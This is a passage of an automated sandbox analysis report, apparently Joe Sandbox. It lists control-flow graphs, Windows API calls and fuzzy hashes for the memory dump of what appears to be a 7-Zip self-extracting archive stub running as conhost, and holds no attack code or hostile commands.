                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00000000,?), ref: 00402541
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402551
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: _wtol.MSVCRT ref: 0040260A
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00000000,00000002), ref: 0040262A
                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404DB8
                                                                                                                                                                                                                                            • Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                                                                                                                          • String ID: 7zSfxFolder%02d
                                                                                                                                                                                                                                          • API String ID: 3387708999-2820892521
                                                                                                                                                                                                                                          • Opcode ID: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                                                                                                                          • Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1319 40b2b0-40b2bb 1320 40b300-40b302 1319->1320 1321 40b2bd-40b2c0 1319->1321 1322 40b2c2-40b2d2 ??2@YAPAXI@Z 1321->1322 1323 40b2eb 1321->1323 1324 40b2d4-40b2d6 1322->1324 1325 40b2ed-40b2ff ??3@YAXPAX@Z 1322->1325 1323->1325 1326 40b2d8 1324->1326 1327 40b2da-40b2e9 memmove 1324->1327 1325->1320 1326->1327 1327->1325
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2C3
                                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,?,?), ref: 0040B2E0
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2F1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memmove
                                                                                                                                                                                                                                          • String ID: hA
                                                                                                                                                                                                                                          • API String ID: 3828600508-1221461045
                                                                                                                                                                                                                                          • Opcode ID: b9d2b8b26deb239750c1256f34f8bdf53d5006d9aff6b58cb728aae548244888
                                                                                                                                                                                                                                          • Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d2b8b26deb239750c1256f34f8bdf53d5006d9aff6b58cb728aae548244888
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1328 402ee4-402f2e call 4192c0 call 412a6a lstrlenA * 2 1332 402f33-402f4f call 412a36 1328->1332 1334 402f55-402f5a 1332->1334 1335 40301f 1332->1335 1334->1335 1336 402f60-402f6a 1334->1336 1337 403021-403025 1335->1337 1338 402f6d-402f72 1336->1338 1339 402fb1-402fb6 1338->1339 1340 402f74-402f79 1338->1340 1341 402fb8-402fcb memcmp 1339->1341 1342 402fdb-402fff memmove 1339->1342 1340->1342 1343 402f7b-402f8e memcmp 1340->1343 1344 402fab-402faf 1341->1344 1345 402fcd-402fd9 1341->1345 1346 403001-403008 1342->1346 1347 40300e-403019 1342->1347 1348 402f94-402f9e 1343->1348 1349 40301b-40301d 1343->1349 1344->1338 1345->1338 1346->1347 1350 402f30 1346->1350 1347->1337 1348->1335 1351 402fa0-402fa6 call 402c21 1348->1351 1349->1337 1350->1332 1351->1344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,?,?), ref: 00402F84
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,?,?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FC1
                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,00000000,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlenmemcmp$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251180759-0
                                                                                                                                                                                                                                          • Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                                                                                                                          • Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1355 4019d2-4019e9 ??2@YAPAXI@Z 1356 4019f4 1355->1356 1357 4019eb-4019f2 call 41616a 1355->1357 1359 4019f6-401a1f call 41334e call 412a6a 1356->1359 1357->1359 1365 401a90 1359->1365 1366 401a21-401a2b ??2@YAPAXI@Z 1359->1366 1367 401a93-401aaa call 409606 1365->1367 1368 401a46 1366->1368 1369 401a2d-401a44 1366->1369 1374 401aab-401ab0 1367->1374 1371 401a48-401a5f call 40113f 1368->1371 1369->1371 1371->1367 1378 401a61-401a6b 1371->1378 1376 401ab2-401ab4 1374->1376 1377 401ab8-401aba 1374->1377 1376->1377 1379 401ac2-401ac7 1377->1379 1380 401abc-401abe 1377->1380 1381 401a79-401a83 ??2@YAPAXI@Z 1378->1381 1382 401a6d-401a6f call 4039e7 1378->1382 1384 401afc-401b00 1379->1384 1380->1379 1385 401a85-401a8e call 4016d4 1381->1385 1386 401ac9 1381->1386 1387 401a74-401a77 1382->1387 1388 401acb-401adc call 4015d8 call 401880 1385->1388 1386->1388 1387->1374 1387->1381 1394 401ae1-401ae8 1388->1394 1395 401af0-401af2 1394->1395 1396 401aea-401aec 1394->1396 1397 401af4-401af6 1395->1397 1398 401afa 1395->1398 1396->1395 1397->1398 1398->1384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,0041E9E8,ExecuteFile,00000026,00000026,?,00406D79,?,0041E9E8,0041E9E8), ref: 004019DF
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00401A23
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 00401A7B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                                                                                            • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                                                                                                          • String ID: ExecuteFile
                                                                                                                                                                                                                                          • API String ID: 1592922708-323923146
                                                                                                                                                                                                                                          • Opcode ID: 1d99ede1e001d7e7e82d2ecfd46f9ffb4f3f9742f954f11f7ef203ccadac83bd
                                                                                                                                                                                                                                          • Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d99ede1e001d7e7e82d2ecfd46f9ffb4f3f9742f954f11f7ef203ccadac83bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5
                                                                                                                                                                                                                                            • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                                                                                            • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 359084233-0
                                                                                                                                                                                                                                          • Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                                                                                                                          • Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _EH_prolog.MSVCRT ref: 00414DD8
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 00414F76
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 00415049
                                                                                                                                                                                                                                            • Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0041505A,00000000,00000001), ref: 0041536E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$H_prolog
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3431946709-0
                                                                                                                                                                                                                                          • Opcode ID: 9e4d4322e0fcba515db248e1bd89817621d99ea5afaaaba96eef9a11a4596329
                                                                                                                                                                                                                                          • Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e4d4322e0fcba515db248e1bd89817621d99ea5afaaaba96eef9a11a4596329
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                                                                                                                            • Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                                                                                                                            • Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404117
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 0040411F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404127
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1642057587-0
                                                                                                                                                                                                                                          • Opcode ID: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                                                                                                                          • Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _EH_prolog.MSVCRT ref: 00415EEF
                                                                                                                                                                                                                                            • Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415F9F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415FDE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@H_prolog
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1329742358-0
                                                                                                                                                                                                                                          • Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                                                                                                                          • Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000000,00405928,?), ref: 004032FC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: f2dd604c1d335bd320c585fab610188f52dab538cc70c04db0cee5ea69d131e6
                                                                                                                                                                                                                                          • Instruction ID: b97806f19c0405a26002511e0c4413f85493d48b720708aaaf3e255db94140b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2dd604c1d335bd320c585fab610188f52dab538cc70c04db0cee5ea69d131e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE06D3255A5206AEA506B387C497DB3B4CDF46327F008576F851E40D0DB3C9A42959E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                                                                                                                          • Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 0041821D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 00418381
